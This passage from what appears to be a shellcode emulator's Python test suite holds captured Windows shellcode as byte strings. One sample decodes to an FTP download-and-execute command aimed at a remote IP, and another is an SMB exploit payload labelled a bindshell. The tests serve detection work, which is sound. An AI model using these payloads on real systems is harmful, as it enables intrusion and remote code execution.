b"\x3b\x54\x24\x04\x75\xe3\x8b\x5f\x24\x01\xeb\x66\x8b\x0c\x4b\x8b" 1025 | shellcode += b"\x5f\x1c\x01\xeb\x8b\x1c\x8b\x01\xeb\x89\x5c\x24\x04\xc3\x31\xc0" 1026 | shellcode += b"\x64\x8b\x40\x30\x85\xc0\x78\x0f\x8b\x40\x0c\x8b\x70\x1c\xad\x8b" 1027 | shellcode += b"\x68\x08\xe9\x0b\x00\x00\x00\x8b\x40\x34\x05\x7c\x00\x00\x00\x8b" 1028 | shellcode += b"\x68\x3c\x5f\x31\xf6\x60\x56\xeb\x0d\x68\xef\xce\xe0\x60\x68\x98" 1029 | shellcode += b"\xfe\x8a\x0e\x57\xff\xe7\xe8\xee\xff\xff\xff\x63\x6d\x64\x20\x2f" 1030 | shellcode += b"\x6b\x20\x65\x63\x68\x6f\x20\x6f\x70\x65\x6e\x20\x32\x31\x37\x2e" 1031 | shellcode += b"\x32\x33\x32\x2e\x39\x32\x2e\x36\x34\x20\x32\x30\x31\x33\x39\x20" 1032 | shellcode += b"\x3e\x20\x69\x26\x65\x63\x68\x6f\x20\x75\x73\x65\x72\x20\x31\x20" 1033 | shellcode += b"\x31\x20\x3e\x3e\x20\x69\x20\x26\x65\x63\x68\x6f\x20\x67\x65\x74" 1034 | shellcode += b"\x20\x65\x72\x61\x73\x65\x6d\x65\x5f\x38\x31\x34\x37\x30\x2e\x65" 1035 | shellcode += b"\x78\x65\x20\x3e\x3e\x20\x69\x20\x26\x65\x63\x68\x6f\x20\x71\x75" 1036 | shellcode += b"\x69\x74\x20\x3e\x3e\x20\x69\x20\x26\x66\x74\x70\x20\x2d\x6e\x20" 1037 | shellcode += b"\x2d\x73\x3a\x69\x20\x26\x65\x72\x61\x73\x65\x6d\x65\x5f\x38\x31" 1038 | shellcode += b"\x34\x37\x30\x2e\x65\x78\x65\x0d\x0a\x00\x42\x42\x42\x42\x42\x42" 1039 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1040 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1041 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1042 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1043 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1044 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1045 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1046 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1047 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1048 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1049 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1050 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1051 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1052 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1053 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1054 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1055 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1056 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1057 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1058 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1059 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1060 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1061 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1062 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1063 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1064 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1065 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1066 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1067 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1068 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1069 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1070 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1071 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1072 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1073 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1074 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1075 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1076 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1077 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1078 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1079 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1080 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1081 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1082 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1083 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42" 1084 | shellcode += b"\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x42\x23\x0a\x03" 1085 | shellcode += b"\x08\x00\xf8\x0f\x01\x00\xf8\x0f\x01\x23\x82\x08\x39\x03\x82\x04" 1086 | shellcode += b"\x11\x00\x43\x43\x43\x43\x20\xf0\xfd\x7f\x53\x56\x57\x66\x81\xec" 1087 | shellcode += b"\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff\x36\x68\x09\x12\xd6\x63" 1088 | shellcode += b"\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2\x00\x00\x00\xff\x76\x04" 1089 | shellcode += b"\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00\x89\x46\x0c\xe8\x3f\x00" 1090 | shellcode += b"\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c\xe8\xcd\x00\x00\x00\x31" 1091 | shellcode += b"\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89\xc3\x56\x8b\x76\x10\x89" 1092 | shellcode += b"\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31\xc0\x50\x50\x50\x53\x50" 1093 | shellcode += b"\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4\x80\x00\x5f\x5e\x5b\xff" 1094 | shellcode += b"\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24\x0c\x8d\x58\x7c\x83\x43" 1095 | shellcode += b"\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81\x63\x28\x00\xf0\xff\xff" 1096 | shellcode += b"\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3\x31\xd2\x64\xff\x32\x64" 1097 | shellcode += b"\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31\xc9\xb1\x02\x89\xdf\xf3" 1098 | shellcode += b"\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64\x8f\x02\x58\x61\xc3\x60" 1099 | shellcode += b"\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08\x89\x07\x8b\x7f\xf8\x81" 1100 | shellcode += b"\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74\x04\x8b\x09\xeb\xf8\x89" 1101 | shellcode += b"\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb\xf6\x89\x11\x89\x4a\x04" 1102 | shellcode += b"\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd\x7f\x8b\x40\x1c\x8b\x58" 1103 | shellcode += b"\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46\x04\xc3\x60\x8b\x6c\x24" 1104 | shellcode += b"\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20" 1105 | shellcode += b"\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee\x31\xff\x31\xc0\xfc\xac" 1106 | shellcode += b"\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb\xf4\x3b\x7c\x24\x24\x75" 1107 | shellcode += b"\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b" 1108 | shellcode += b"\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2\x08\x00\xeb\xfe\x43\x43" 1109 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1110 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1111 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1112 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1113 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1114 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1115 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1116 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1117 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1118 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1119 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1120 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1121 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1122 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1123 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1124 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1125 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1126 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1127 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1128 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1129 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1130 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1131 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1132 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1133 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1134 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1135 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1136 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1137 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1138 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1139 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1140 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1141 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1142 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1143 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1144 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1145 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1146 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1147 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1148 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1149 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1150 | shellcode += b"\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43\x43" 1151 | shellcode += b"\x43\x43\x23\x82\x04\x20\x03\x09\x00\xeb\x06\x90\x90\x90\x90\x90" 1152 | shellcode += b"\x90\x03\x82\x04\x11\x00\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1153 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1154 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1155 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1156 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1157 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1158 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1159 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1160 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1161 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1162 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1163 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1164 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1165 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1166 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1167 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1168 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1169 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1170 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1171 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1172 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1173 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1174 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1175 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1176 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1177 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1178 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1179 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1180 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1181 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1182 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1183 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1184 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1185 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1186 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1187 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1188 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1189 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1190 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1191 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1192 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1193 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1194 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1195 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1196 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1197 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1198 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1199 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1200 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1201 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1202 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1203 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1204 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1205 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1206 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1207 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1208 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1209 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1210 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1211 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1212 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1213 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1214 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1215 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1216 | shellcode += b"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44" 1217 | shellcode += b"\x44\x44\x44\x44\x44\x44\x00\x00\x00\x00\x00\x00" 1218 | 1219 | self.runShellcode(shellcode, 22) 1220 | 1221 | def testShellcode23(self): 1222 | """ 1223 | Bindshell::schoenborn 1224 | """ 1225 | 1226 | shellcode = b"\x00\x00\x00\xa4\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8" 1227 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe" 1228 | shellcode += b"\x00\x00\x10\x00\x0c\xff\x00\xa4\x00\x04\x11\x0a\x00\x00\x00\x00" 1229 | shellcode += b"\x00\x00\x00\x20\x00\x00\x00\x00\x00\xd4\x00\x00\x80\x69\x00\x4e" 1230 | shellcode += b"\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xe0\x00" 1231 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 1232 | shellcode += b"\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00" 1233 | shellcode += b"\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00" 1234 | shellcode += b"\x35\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00" 1235 | shellcode += b"\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00" 1236 | shellcode += b"\x2e\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\xda\xff\x53\x4d\x42" 1237 | shellcode += b"\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00" 1238 | shellcode += b"\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x08\x20\x00\x0c\xff\x00\xda" 1239 | shellcode += b"\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00\x57\x00\x00\x00\x00" 1240 | shellcode += b"\x00\xd4\x00\x00\x80\x9f\x00\x4e\x54\x4c\x4d\x53\x53\x50\x00\x03" 1241 | shellcode += b"\x00\x00\x00\x01\x00\x01\x00\x46\x00\x00\x00\x00\x00\x00\x00\x47" 1242 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x40" 1243 | shellcode += b"\x00\x00\x00\x06\x00\x06\x00\x40\x00\x00\x00\x10\x00\x10\x00\x47" 1244 | shellcode += b"\x00\x00\x00\x15\x8a\x88\xe0\x48\x00\x4f\x00\x44\x00\x00\xed\x41" 1245 | shellcode += b"\x2c\x27\x86\x26\xd2\x59\xa0\xb3\x5e\xaa\x00\x88\x6f\xc5\x57\x00" 1246 | shellcode += b"\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00" 1247 | shellcode += b"\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00\x35\x00" 1248 | shellcode += b"\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77\x00\x73\x00" 1249 | shellcode += b"\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00\x2e\x00" 1250 | shellcode += b"\x30\x00\x00\x00\x00\x00\x00\x00\x00\x5c\xff\x53\x4d\x42\x75\x00" 1251 | shellcode += b"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 1252 | shellcode += b"\x00\x00\x00\x00\xff\xfe\x00\x08\x30\x00\x04\xff\x00\x5a\x00\x08" 1253 | shellcode += b"\x00\x01\x00\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00" 1254 | shellcode += b"\x2e\x00\x33\x00\x35\x00\x2e\x00\x32\x00\x32\x00\x39\x00\x2e\x00" 1255 | shellcode += b"\x33\x00\x39\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00" 1256 | shellcode += b"\x3f\x3f\x3f\x3f\x3f\x00\x00\x00\x00\x66\xff\x53\x4d\x42\xa2\x00" 1257 | shellcode += b"\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" 1258 | shellcode += b"\x00\x00\x00\x08\x78\x04\x00\x08\x40\x00\x18\xff\x00\xde\xde\x00" 1259 | shellcode += b"\x10\x00\x16\x00\x00\x00\x00\x00\x00\x00\x9f\x01\x02\x00\x00\x00" 1260 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00" 1261 | shellcode += b"\x00\x00\x40\x00\x00\x00\x02\x00\x00\x00\x03\x13\x00\x00\x5c\x00" 1262 | shellcode += b"\x62\x00\x72\x00\x6f\x00\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00" 1263 | shellcode += b"\x00\x00\x00\x9c\xff\x53\x4d\x42\x25\x00\x00\x00\x00\x18\x07\xc8" 1264 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" 1265 | shellcode += b"\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00" 1266 | shellcode += b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" 1267 | shellcode += b"\x00\x26\x00\x00\x40\x59\x00\x00\x5c\x00\x50\x00\x49\x00\x50\x00" 1268 | shellcode += b"\x45\x00\x5c\x00\x00\x00\x40\x00\x05\x00\x0b\x03\x10\x00\x00\x00" 1269 | shellcode += b"\x48\x00\x00\x00\x01\x00\x00\x00\xb8\x10\xb8\x10\x00\x00\x00\x00" 1270 | shellcode += b"\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4e\x9f\x8d\x3d\xa0\xce\x11" 1271 | shellcode += 